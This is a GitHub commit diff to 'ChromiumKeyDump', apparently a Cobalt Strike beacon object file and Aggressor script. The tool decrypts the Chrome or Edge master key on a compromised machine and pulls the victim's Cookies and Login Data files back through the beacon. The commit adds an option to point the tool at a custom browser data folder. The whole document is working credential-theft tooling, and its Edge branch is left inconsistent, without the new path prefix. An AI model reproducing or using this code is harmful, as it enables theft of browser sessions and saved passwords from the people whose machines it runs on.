Merge pull request #1 from CUHKJason/test1

Update with specific path options on ChromiumKeyDump
CUHKJason · Oct 5, 2022 · 017ab2d · 017ab2d
2 parents 8edd331 + 392f388
commit 017ab2d
Show file tree

Hide file tree

Showing 2 changed files with 18 additions and 36 deletions.
diff --git a/ChromiumKeyDump/ChromiumKeyDump.cna b/ChromiumKeyDump/ChromiumKeyDump.cna
@@ -6,6 +6,8 @@ alias chromiumkeydump {
     $arch = binfo($bid, "barch");
     $username = split(" ", binfo($bid, "user"))[0];
 
+    $path = iff(-istrue $4, $4, "c:\\Users\\".$username."\\AppData\\Local\\");
+
 	if ($arch eq "x64") {
         $handle = openf(script_resource("./bin/ChromiumKeyDump.x64.o"));
         $data = readb($handle, -1);
@@ -18,7 +20,7 @@ alias chromiumkeydump {
 
     if ($browser eq "chrome") {
         $browser_type = 0;
-        $browser_path = "Google\\Chrome";
+        $browser_path = $path."Google\\Chrome";
     } else if ($browser eq "edge") {
         $browser_type = 1;
         $browser_path = "Microsoft\\Edge";
@@ -27,30 +29,30 @@ alias chromiumkeydump {
         return;
     }
 
-    $args = bof_pack($bid, "i", $browser_type);
+    $args = bof_pack($bid, "z", $browser_path."\\User Data\\Local State");
 
     if ($command eq "masterkey") {
         btask($bid, "Tasked to dump ".uc($browser)." Masterkey");
         beacon_inline_execute($bid, $data, "go", $args);
     } else if ($command eq "cookies") {
         btask($bid, "Tasked to download ".uc($browser)." Cookies file");
-        bdownload($bid,"c:\\Users\\".$username."\\AppData\\Local\\".$browser_path."\\User Data\\Default\\Network\\Cookies");
+        bdownload($bid,$browser_path."\\User Data\\Default\\Network\\Cookies");
     } else if ($command eq "logindata") {
         btask($bid, "Tasked to download ".uc($browser)." LoginData file");
-        bdownload($bid,"c:\\Users\\".$username."\\AppData\\Local\\".$browser_path."\\User Data\\Default\\Login Data");    
+        bdownload($bid,$browser_path."\\User Data\\Default\\Login Data");    
     }else if ($command eq "all") {
         btask($bid, "Tasked to dump ".uc($browser)." Masterkey and download Cookies/LoginData");
         beacon_inline_execute($bid, $data, "go", $args);
-        bdownload($bid,"c:\\Users\\".$username."\\AppData\\Local\\".$browser_path."\\User Data\\Default\\Network\\Cookies");
-        bdownload($bid,"c:\\Users\\".$username."\\AppData\\Local\\".$browser_path."\\User Data\\Default\\Login Data");  
+        bdownload($bid,$browser_path."\\User Data\\Default\\Network\\Cookies");
+        bdownload($bid,$browser_path."\\User Data\\Default\\Login Data");  
     } else {
         berror($bid, "Check parameters: help chromiumkeydump\n");
         return;
     }
 }
 
 beacon_command_register("chromiumkeydump", "Dump Chrome/Edge Masterkey and download Cookies/LoginData", 
-"\nUsage: chromiumkeydump [edge|chrome] [argument(required)]\n
+"\nUsage: chromiumkeydump [edge|chrome] [argument(required)] [path to Data folder(default: %localappdata%)]\n
                 Arguments       Description
                 ---------       -----------
                 masterkey       Dump Masterkey

diff --git a/ChromiumKeyDump/src/ChromiumKeyDump.cpp b/ChromiumKeyDump/src/ChromiumKeyDump.cpp
@@ -19,8 +19,10 @@ BOF_REDECLARE(CRYPT32, CryptBinaryToStringA);
 BOF_REDECLARE(CRYPT32, CryptUnprotectData);
 BOF_REDECLARE(SHELL32, SHGetKnownFolderPath);
 BOF_REDECLARE(MSVCRT, malloc);
+BOF_REDECLARE(MSVCRT, mbstowcs);
 BOF_REDECLARE(MSVCRT, free);
 BOF_REDECLARE(MSVCRT, strncpy);
+BOF_REDECLARE(MSVCRT, strlen);
 BOF_REDECLARE(NTDLL, memcpy);
 BOF_REDECLARE(KERNEL32, lstrcatW);
 BOF_REDECLARE(KERNEL32, lstrlenW);
@@ -36,7 +38,9 @@ BOF_REDECLARE(KERNEL32, GetLastError);
     BOF_LOCAL(CRYPT32, CryptUnprotectData); \
     BOF_LOCAL(SHELL32, SHGetKnownFolderPath); \
     BOF_LOCAL(MSVCRT, malloc); \
+    BOF_LOCAL(MSVCRT, mbstowcs); \
     BOF_LOCAL(MSVCRT, free); \
+    BOF_LOCAL(MSVCRT, strlen); \
     BOF_LOCAL(MSVCRT, strncpy); \
     BOF_LOCAL(NTDLL, memcpy); \
     BOF_LOCAL(KERNEL32, lstrcatW); \
@@ -47,37 +51,13 @@ BOF_REDECLARE(KERNEL32, GetLastError);
 extern "C" void go(char* args, int alen) {
     BOF_LOCALS;
 
-    if (alen < 4) {
-        BeaconPrintf(CALLBACK_ERROR, "[ChromiumKeyDump] Browser type not selected\n");
-        return;
-    }
-
     datap  parser;
-    int browser_type;
-    BeaconDataParse(&parser, args, alen);
-    browser_type = BeaconDataInt(&parser);
-
+    char * path;
     WCHAR szFilePath[MAX_PATH];
-    GUID local_FOLDERID_LocalAppData = { 0xF1B32785, 0x6FBA, 0x4FCF, 0x9D, 0x55, 0x7B, 0x8E, 0x7F, 0x15, 0x70, 0x91 };
-
-    PWSTR appdate;
-    HRESULT result;
-    if ((result = SHGetKnownFolderPath(local_FOLDERID_LocalAppData, 0, 0, &appdate)) != ((HRESULT)0L)) {
-        BeaconPrintf(CALLBACK_ERROR, "[ChromiumKeyDump] SHGetKnownFolderPath failed hresult=%08x\n", result);
-        return;
-    }
-
-    memcpy(szFilePath, appdate, lstrlenW(appdate) * 2 + 2);
-
-    if (browser_type == 0) {
-        lstrcatW(szFilePath, L"\\Google\\Chrome\\User Data\\Local State");
-    }
-    else if (browser_type == 1) {
-        lstrcatW(szFilePath, L"\\Microsoft\\Edge\\User Data\\Local State");
-    }
-    else {
-        BeaconPrintf(CALLBACK_ERROR, "[ChromiumKeyDump] Wrong browser selected\n");
-    }
+    BeaconDataParse(&parser, args, alen);
+    path = BeaconDataExtract(&parser, NULL);
+    const size_t size = strlen(path) + 1;
+    mbstowcs(szFilePath, path, size);
 
     BeaconPrintf(CALLBACK_OUTPUT, "[ChromiumKeyDump] Target File: %S\n", szFilePath);